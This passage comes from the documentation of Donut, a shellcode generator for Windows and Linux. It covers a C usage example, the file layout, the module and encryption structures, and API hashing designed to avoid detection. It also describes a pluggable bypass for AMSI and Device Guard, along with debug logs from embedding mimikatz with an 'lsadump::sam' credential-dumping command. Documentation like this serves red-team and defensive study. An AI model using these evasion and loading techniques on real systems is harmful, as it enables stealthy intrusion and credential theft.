316 <span style='color:#800080; '>}</span>
317 <span style='color:#800080; '>}</span> <span style='color:#800000; font-weight:bold; '>else</span> <span style='color:#800080; '>{</span>
318 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to load donut.so.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
319 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
320 <span style='color:#800080; '>}</span>
321 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
322
323 <span style='color:#603000; '>memset</span><span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>,</span> <span style='color:#008c00; '>0</span><span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>sizeof</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
324
325 <span style='color:#696969; '>// copy input file</span>
326 <span style='color:#400000; '>lstrcpyn</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>.</span>input<span style='color:#808030; '>,</span> argv<span style='color:#808030; '>[</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>]</span><span style='color:#808030; '>,</span> DONUT_MAX_NAME<span style='color:#808030; '>-</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
327
328 <span style='color:#696969; '>// default settings</span>
329 c<span style='color:#808030; '>.</span>inst_type <span style='color:#808030; '>=</span> DONUT_INSTANCE_EMBED<span style='color:#800080; '>;</span> <span style='color:#696969; '>// file is embedded</span>
330 c<span style='color:#808030; '>.</span>arch <span style='color:#808030; '>=</span> DONUT_ARCH_X84<span style='color:#800080; '>;</span> <span style='color:#696969; '>// dual-mode (x86+amd64)</span>
331 c<span style='color:#808030; '>.</span>bypass <span style='color:#808030; '>=</span> DONUT_BYPASS_CONTINUE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// continues loading even if disabling AMSI/WLDP fails</span>
332 c<span style='color:#808030; '>.</span>format <span style='color:#808030; '>=</span> DONUT_FORMAT_BINARY<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default output format</span>
333 c<span style='color:#808030; '>.</span>compress <span style='color:#808030; '>=</span> DONUT_COMPRESS_NONE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compression is disabled by default</span>
334 c<span style='color:#808030; '>.</span>entropy <span style='color:#808030; '>=</span> DONUT_ENTROPY_DEFAULT<span style='color:#800080; '>;</span> <span style='color:#696969; '>// enable random names + symmetric encryption by default</span>
335 c<span style='color:#808030; '>.</span>exit_opt <span style='color:#808030; '>=</span> DONUT_OPT_EXIT_THREAD<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default behaviour is to exit the thread</span>
336 c<span style='color:#808030; '>.</span>thread <span style='color:#808030; '>=</span> <span style='color:#008c00; '>1</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint as a thread</span>
337 c<span style='color:#808030; '>.</span>unicode <span style='color:#808030; '>=</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line will not be converted to unicode for unmanaged DLL function</span>
338
339 <span style='color:#696969; '>// generate the shellcode</span>
340 err <span style='color:#808030; '>=</span> _DonutCreate<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
341 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>err <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> DONUT_ERROR_SUCCESS<span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
342 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Error : </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> _DonutError<span style='color:#808030; '>(</span>err<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
343 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
344 <span style='color:#800080; '>}</span>
345
346 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ loader saved to </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> c<span style='color:#808030; '>.</span>output<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
347
348 _DonutDelete<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
349 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
350 <span style='color:#800080; '>}</span>
351 </pre>
352
353 <h2>Internals</h2>
354
355 <p>Everything that follows concerns internal workings of Donut and is not required knowledge to generate the shellcode/loader.</p>
356
357 <h2 id="com">6. Donut Components</h2>
358
359 <p>The following table lists the name of each file and what it's used for.</p>
360
361 <table border="1">
362 <tr>
363 <th>File</th>
364 <th>Description</th>
365 </tr>
366 <tr>
367 <td>donut.c</td>
368 <td>Main file for the shellcode generator.</td>
369 </tr>
370 <tr>
371 <td>include/donut.h</td>
372 <td>C header file used by the generator.</td>
373 </tr>
374 <tr>
375 <td>lib/donut.dll and lib/donut.lib</td>
376 <td>Dynamic and static libraries for Microsoft Windows.</td>
377 </tr>
378 <tr>
379 <td>lib/donut.so and lib/donut.a</td>
380 <td>Dynamic and static libraries for Linux.</td>
381 </tr>
382 <tr>
383 <td>lib/donut.h</td>
384 <td>C header file to be used in C/C++ based projects.</td>
385 </tr>
386 <tr>
387 <td>donutmodule.c</td>
388 <td>The CPython wrapper for Donut. Used by the Python module.</td>
389 </tr>
390 <tr>
391 <td>setup.py</td>
392 <td>The setup file for installing Donut as a Pip Python3 module.</td>
393 </tr>
394 <tr>
395 <td>hash.c</td>
396 <td>Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.</td>
397 </tr>
398 <tr>
399 <td>encrypt.c</td>
400 <td>Chaskey block cipher for encrypting modules.</td>
401 </tr>
402 <tr>
403 <td>loader/loader.c</td>
404 <td>Main file for the shellcode.</td>
405 </tr>
406 <tr>
407 <td>loader/inmem_dotnet.c</td>
408 <td>In-Memory loader for .NET EXE/DLL assemblies.</td>
409 </tr>
410 <tr>
411 <td>loader/inmem_pe.c</td>
412 <td>In-Memory loader for EXE/DLL files.</td>
413 </tr>
414 <tr>
415 <td>loader/inmem_script.c</td>
416 <td>In-Memory loader for VBScript/JScript files.</td>
417 </tr>
418 <tr>
419 <td>loader/activescript.c</td>
420 <td>ActiveScriptSite interface required for in-memory execution of VBS/JS files.</td>
421 </tr>
422 <tr>
423 <td>loader/wscript.c</td>
424 <td>Supports a number of WScript methods that cscript/wscript support.</td>
425 </tr>
426 <tr>
427 <td>loader/depack.c</td>
428 <td>Supports unpacking of modules compressed with aPLib.</td>
429 </tr>
430 <tr>
431 <td>loader/bypass.c</td>
432 <td>Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP).</td>
433 </tr>
434 <tr>
435 <td>loader/http_client.c</td>
436 <td>Downloads a module from remote staging server into memory.</td>
437 </tr>
438 <tr>
439 <td>loader/peb.c</td>
440 <td>Used to resolve the address of DLL functions via Process Environment Block (PEB).</td>
441 </tr>
442 <tr>
443 <td>loader/clib.c</td>
444 <td>Replaces common C library functions like memcmp, memcpy and memset.</td>
445 </tr>
446 <tr>
447 <td>loader/getpc.c</td>
448 <td>Assembly code stub to return the value of the EIP register.</td>
449 </tr>
450 <tr>
451 <td>loader/inject.c</td>
452 <td>Simple process injector for Windows that can be used for testing the loader.</td>
453 </tr>
454 <tr>
455 <td>loader/runsc.c</td>
456 <td>Simple shellcode runner for Linux and Windows that can be used for testing the loader.</td>
457 </tr>
458 <tr>
459 <td>loader/exe2h/exe2h.c</td>
460 <td>Extracts the machine code from compiled loader and saves as array to C header and Go files.</td>
461 </tr>
462 </table>
463
464 <h2 id="instance">7. Donut Instance</h2>
465
466 <p>The loader will always contain an <var>Instance</var> which can be viewed simply as a configuration. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, if encryption is enabled, it will decrypt the data before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>. The data will be decompressed if required and only then is it loaded into memory for execution.</p>
467
468 <h2 id="module">8. Donut Module</h2>
469
470 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
471
472 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
473 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE/DLL/JS/VBS</span>
474 <span style='color:#800000; font-weight:bold; '>int</span> thread<span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint of unmanaged EXE as a thread</span>
475 <span style='color:#800000; font-weight:bold; '>int</span> compress<span style='color:#800080; '>;</span> <span style='color:#696969; '>// indicates engine used for compression</span>
476
477 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
478 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
479 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
480 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
481
482 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for both managed and unmanaged DLL/EXE</span>
483 <span style='color:#800000; font-weight:bold; '>int</span> unicode<span style='color:#800080; '>;</span> <span style='color:#696969; '>// convert param to unicode before passing to DLL function</span>
484
485 <span style='color:#800000; font-weight:bold; '>char</span> sig<span style='color:#808030; '>[</span>DONUT_SIG_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to verify decryption</span>
486 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// hash of sig, to verify decryption was ok</span>
487
488 uint32_t zlen<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compressed size of EXE/DLL/JS/VBS file</span>
489 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// real size of EXE/DLL/JS/VBS file</span>
490 uint8_t data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/JS/VBS file</span>
491 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
492 </pre>
493
494 <h2 id="hashing">9. Win32 API Hashing</h2>
495
496 <p>A hash function called <a href="https://github.com/odzhan/maru">Maru</a> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the <a href="https://tinycrypt.wordpress.com/2017/01/11/asmcodes-speck/">SPECK</a> block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
497
498 <h2 id="encryption">10. Symmetric Encryption</h2>
499
500 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
501
502 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
503 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
504 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
505 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
506 </pre>
507
508 <p><a href="https://tinycrypt.wordpress.com/2017/02/20/asmcodes-chaskey-cipher/">Chaskey</a>, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut loader. Future releases will support downloading a key via DNS and also asymmetric encryption.</p>
509
510 <h2 id="bypass">11. Bypasses for AMSI/WLDP</h2>
511
512 <p>Donut includes a bypass system for AMSI and WLDP. Currently, Donut can bypass:</p>
513
514 <ul>
515 <li>AMSI in .NET v4.8</li>
516 <li>Device Guard policy preventing dynamically generated code from executing.</li>
517 </ul>
518
519 <p>You may customize our bypasses or add your own. The bypass logic is defined in loader/bypass.c. Each bypass implements the DisableAMSI with the signature <code>BOOL DisableAMSI(PDONUT_INSTANCE inst)</code> and DisableWLDP with <code>BOOL DisableWLDP(PDONUT_INSTANCE inst)</code>, both of which have a corresponding preprocessor directive. We have several <code>#if defined</code> blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass for AMSI is called <code>BYPASS_AMSI_A</code>. If donut is built with that variable defined, then that bypass will be used.</p>
520
521 <p>Why do it this way? Because it means that only the bypass you are using is built into loader.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.</p>
522
523 <p>Another benefit of this design is that you may write your own AMSI/WLDP bypass. To build Donut with your new bypass, use an <code>if defined</code> block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.</p>
524
525 <p>If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.</p>
526
527 <h2 id="debug">12. Debugging The Generator and Loader</h2>
528
529 <p>The loader is capable of displaying detailed information about each step of file execution and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make on Windows.</p>
530
531 <pre>
532 nmake debug -f Makefile.msvc
533 make debug -f Makefile.mingw
534 </pre>
535
536 <p>Use Donut to create a shellcode as you normally would and a file called <code>instance</code> will be saved to disk. The following example embeds mimikatz.exe in the loader using the Xpress Huffman compression algorithm. It also tells the loader to run the entrypoint as a thread, so that when mimikatz calls an exit-related API, it simply exits the thread. </p>
537
538 <pre>
539 C:\hub\donut>donut -t -z5 mimikatz.exe -p"lsadump::sam exit"
540
541 [ Donut shellcode generator v0.9.3
542 [ Copyright (c) 2019 TheWover, Odzhan
543
544 DEBUG: donut.c:1505:DonutCreate(): Entering.
545 DEBUG: donut.c:1283:validate_loader_cfg(): Validating loader configuration.
546 DEBUG: donut.c:1380:validate_loader_cfg(): Loader configuration passed validation.
547 DEBUG: donut.c:459:read_file_info(): Entering.
548 DEBUG: donut.c:467:read_file_info(): Checking extension of mimikatz.exe
549 DEBUG: donut.c:475:read_file_info(): Extension is ".exe"
550 DEBUG: donut.c:491:read_file_info(): File is EXE
551 DEBUG: donut.c:503:read_file_info(): Mapping mimikatz.exe into memory
552 DEBUG: donut.c:245:map_file(): Entering.
553 DEBUG: donut.c:531:read_file_info(): Checking characteristics
554 DEBUG: donut.c:582:read_file_info(): Leaving with error : 0
555 DEBUG: donut.c:1446:validate_file_cfg(): Validating configuration for input file.
556 DEBUG: donut.c:1488:validate_file_cfg(): Validation passed.
557 DEBUG: donut.c:674:build_module(): Entering.
558 DEBUG: donut.c:381:compress_file(): Reading fragment and workspace size
559 DEBUG: donut.c:387:compress_file(): workspace size : 1415999 | fragment size : 5161
560 DEBUG: donut.c:390:compress_file(): Allocating memory for compressed data.
561 DEBUG: donut.c:396:compress_file(): Compressing 0000024E9D7E0000 to 0000024E9DA50080 with RtlCompressBuffer(XPRESS HUFFMAN)
562 DEBUG: donut.c:433:compress_file(): Original file size : 1013912 | Compressed : 478726
563 DEBUG: donut.c:434:compress_file(): File size reduced by 53%
564 DEBUG: donut.c:436:compress_file(): Leaving with error : 0
565 DEBUG: donut.c:684:build_module(): Assigning 478726 bytes of 0000024E9DA50080 to data
566 DEBUG: donut.c:695:build_module(): Allocating 480054 bytes of memory for DONUT_MODULE
567 DEBUG: donut.c:772:build_module(): Copying data to module
568 DEBUG: donut.c:784:build_module(): Leaving with error : 0
569 DEBUG: donut.c:804:build_instance(): Entering.
570 DEBUG: donut.c:807:build_instance(): Allocating memory for instance
571 DEBUG: donut.c:814:build_instance(): The size of module is 480054 bytes. Adding to size of instance.
572 DEBUG: donut.c:817:build_instance(): Total length of instance : 483718
573 DEBUG: donut.c:846:build_instance(): Generating random key for instance
574 DEBUG: donut.c:855:build_instance(): Generating random key for module
575 DEBUG: donut.c:864:build_instance(): Generating random string to verify decryption
576 DEBUG: donut.c:871:build_instance(): Generating random IV for Maru hash
577 DEBUG: donut.c:879:build_instance(): Generating hashes for API using IV: 546E2FF018FD2A54
578 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : LoadLibraryA = ABB30FFE918BCF83
579 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetProcAddress = EF2C0663C0CDDC21
580 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetModuleHandleA = D40916771ECED480
581 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualAlloc = E445DF6F06219E85
582 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualFree = C6C992D6040B85A8
583 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualQuery = 556BF46109D12C9E
584 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualProtect = 032546126BB99713
585 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : Sleep = DEB476FF0E3D71E8
586 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : MultiByteToWideChar = A0DD238846F064F4
587 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetUserDefaultLCID = 03DE3865FC2DF17B
588 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : WaitForSingleObject = 40FCB82879AAB610
589 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : CreateThread = 954101E48C1D54F5
590 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetThreadContext = 18669E0FDC3FD0B8
591 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetCurrentThread = EB6E7C47D574D9F9
592 DEBUG: donut.c:892:build_instance(): Hash for shell32.dll : CommandLineToArgvW = EFD410EF534D57C3
593 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayCreate = A5AA007611CB6580
594 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayCreateVector = D5CEC16DD247A68A
595 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayPutElement = 6B140B7B87F27359
596 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayDestroy = C2FA65C58C68FC6C
597 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayGetLBound = ED5A331176BB8DDA
598 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayGetUBound = EA0D8BE258DC67DA
599 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SysAllocString = 3A7BBDEAA1DC3354
600 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SysFreeString = EEB92DFE18B7C306
601 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : LoadTypeLib = 687DD816E578C4E7
602 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetCrackUrlA = B0F95D86327741EC
603 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetOpenA = BDD70375BB72B131
604 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetConnectA = E74A4DD56C6B3154
605 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetSetOptionA = 527C502C0BC36267
606 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetReadFile = 055C3E8A4CF21475
607 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetCloseHandle = 4D1965E404D783BA
608 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpOpenRequestA = CC736E0143DB8F2A
609 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpSendRequestA = C87BFE8578BB0049
610 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpQueryInfoA = FC7CC8D82764DFBF
611 DEBUG: donut.c:892:build_instance(): Hash for mscoree.dll : CorBindToRuntime = 6F6432B588D39C8D
612 DEBUG: donut.c:892:build_instance(): Hash for mscoree.dll : CLRCreateInstance = 2828FB8F68349704
613 DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoInitializeEx = 9752F1AA167F8E79
614 DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoCreateInstance = 8211344A519AF3BA
615 DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoUninitialize = FF0605E1258BEE44
616 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlEqualUnicodeString = D5CEDA5C642834D7
617 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlEqualString = A69EAF72442222A4
618 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlUnicodeStringToAnsiString = 4DBA40D90962E1D6
619 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlInitUnicodeString = A1143A47656B2526
620 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlExitUserThread = 62FF88CDC045477E
621 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlExitUserProcess = E20BCE2C11E82C7B
622 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlCreateUnicodeString = A469294ED1E1D8DC
623 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlGetCompressionWorkSpaceSize = 61E26E7C5DD38D2C
624 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlDecompressBufferEx = 145C8CF24F5EAF3E
625 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : NtContinue = 12ACA3AD3CC20AF5
626 DEBUG: donut.c:895:build_instance(): Setting number of API to 48
627 DEBUG: donut.c:898:build_instance(): Setting DLL names to ole32;oleaut32;wininet;mscoree;shell32
628 DEBUG: donut.c:941:build_instance(): Copying strings required to bypass AMSI
629 DEBUG: donut.c:949:build_instance(): Copying strings required to bypass WLDP
630 DEBUG: donut.c:960:build_instance(): Copying strings required to replace command line.
631 DEBUG: donut.c:968:build_instance(): Copying strings required to intercept exit-related API
632 DEBUG: donut.c:1018:build_instance(): Copying module data to instance
633 DEBUG: donut.c:1024:build_instance(): Encrypting instance
634 DEBUG: donut.c:1042:build_instance(): Leaving with error : 0
635 DEBUG: donut.c:1210:build_loader(): Inserting opcodes
636 DEBUG: donut.c:1248:build_loader(): Copying 29548 bytes of x86 + amd64 shellcode
637 DEBUG: donut.c:1090:save_loader(): Saving instance 0000024E9DE90080 to file. 483718 bytes.
638 DEBUG: donut.c:1061:save_file(): Entering.
639 DEBUG: donut.c:1065:save_file(): Writing 483718 bytes of 0000024E9DE90080 to instance
640 DEBUG: donut.c:1070:save_file(): Leaving with error : 0
641 DEBUG: donut.c:1139:save_loader(): Saving loader as binary
642 DEBUG: donut.c:1172:save_loader(): Leaving with error : 0
643 DEBUG: donut.c:1540:DonutCreate(): Leaving with error : 0
644 [ Instance type : Embedded
645 [ Module file : "mimikatz.exe"
646 [ Entropy : Random names + Encryption
647 [ Compressed : Xpress Huffman (Reduced by 53%)
648 [ File type : EXE
649 [ Parameters : lsadump::sam exit
650 [ Target CPU : x86+amd64
651 [ AMSI/WDLP : continue
652 [ Shellcode : "loader.bin"
653 DEBUG: donut.c:1556:DonutDelete(): Entering.
654 DEBUG: donut.c:1562:DonutDelete(): Releasing memory for module.
655 DEBUG: donut.c:1568:DonutDelete(): Releasing memory for configuration.
656 DEBUG: donut.c:1574:DonutDelete(): Releasing memory for loader.
657 DEBUG: donut.c:289:unmap_file(): Releasing compressed data.
658 DEBUG: donut.c:294:unmap_file(): Unmapping input file.
659 DEBUG: donut.c:299:unmap_file(): Closing input file.
660 DEBUG: donut.c:1580:DonutDelete(): Leaving.
661 </pre>
662
663 <p>If successfully created, there should now be a file called "instance" in the same directory as the loader. Pass the instance file as a parameter to loader.exe which should also be in the same directory.</p>
664
665 <pre>
666 C:\hub\donut>loader instance
667 Running...
668 DEBUG: loader/loader.c:109:MainProc(): Maru IV : 546E2FF018FD2A54
669 DEBUG: loader/loader.c:112:MainProc(): Resolving address for VirtualAlloc() : E445DF6F06219E85
670 DEBUG: loader/loader.c:116:MainProc(): Resolving address for VirtualFree() : C6C992D6040B85A8
671 DEBUG: loader/loader.c:120:MainProc(): Resolving address for RtlExitUserProcess() : E20BCE2C11E82C7B
672 DEBUG: loader/loader.c:129:MainProc(): VirtualAlloc : 00007FFFD1DAA190 VirtualFree : 00007FFFD1DAA180
673 DEBUG: loader/loader.c:131:MainProc(): Allocating 483718 bytes of RW memory
674 DEBUG: loader/loader.c:143:MainProc(): Copying 483718 bytes of data to memory 00000178FEA30000
675 DEBUG: loader/loader.c:147:MainProc(): Zero initializing PDONUT_ASSEMBLY
676 DEBUG: loader/loader.c:156:MainProc(): Decrypting 483718 bytes of instance
677 DEBUG: loader/loader.c:163:MainProc(): Generating hash to verify decryption
678 DEBUG: loader/loader.c:165:MainProc(): Instance : 33C49D5864287AEF | Result : 33C49D5864287AEF
679 DEBUG: loader/loader.c:172:MainProc(): Resolving LoadLibraryA
680 DEBUG: loader/loader.c:189:MainProc(): Loading ole32
681 DEBUG: loader/loader.c:189:MainProc(): Loading oleaut32
682 DEBUG: loader/loader.c:189:MainProc(): Loading wininet
683 DEBUG: loader/loader.c:189:MainProc(): Loading mscoree
684 DEBUG: loader/loader.c:189:MainProc(): Loading shell32
685 DEBUG: loader/loader.c:193:MainProc(): Resolving 48 API
686 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EF2C0663C0CDDC21
687 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D40916771ECED480
688 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E445DF6F06219E85
689 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C6C992D6040B85A8
690 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 556BF46109D12C9E
691 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 032546126BB99713
692 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for DEB476FF0E3D71E8
693 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A0DD238846F064F4
694 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 03DE3865FC2DF17B
695 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 40FCB82879AAB610
696 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 954101E48C1D54F5
697 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 18669E0FDC3FD0B8
698 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EB6E7C47D574D9F9
699 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EFD410EF534D57C3
700 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A5AA007611CB6580
701 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D5CEC16DD247A68A
702 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 6B140B7B87F27359
703 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C2FA65C58C68FC6C
704 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for ED5A331176BB8DDA
705 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EA0D8BE258DC67DA
706 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 3A7BBDEAA1DC3354
707 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EEB92DFE18B7C306
708 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 687DD816E578C4E7
709 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for B0F95D86327741EC
710 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for BDD70375BB72B131
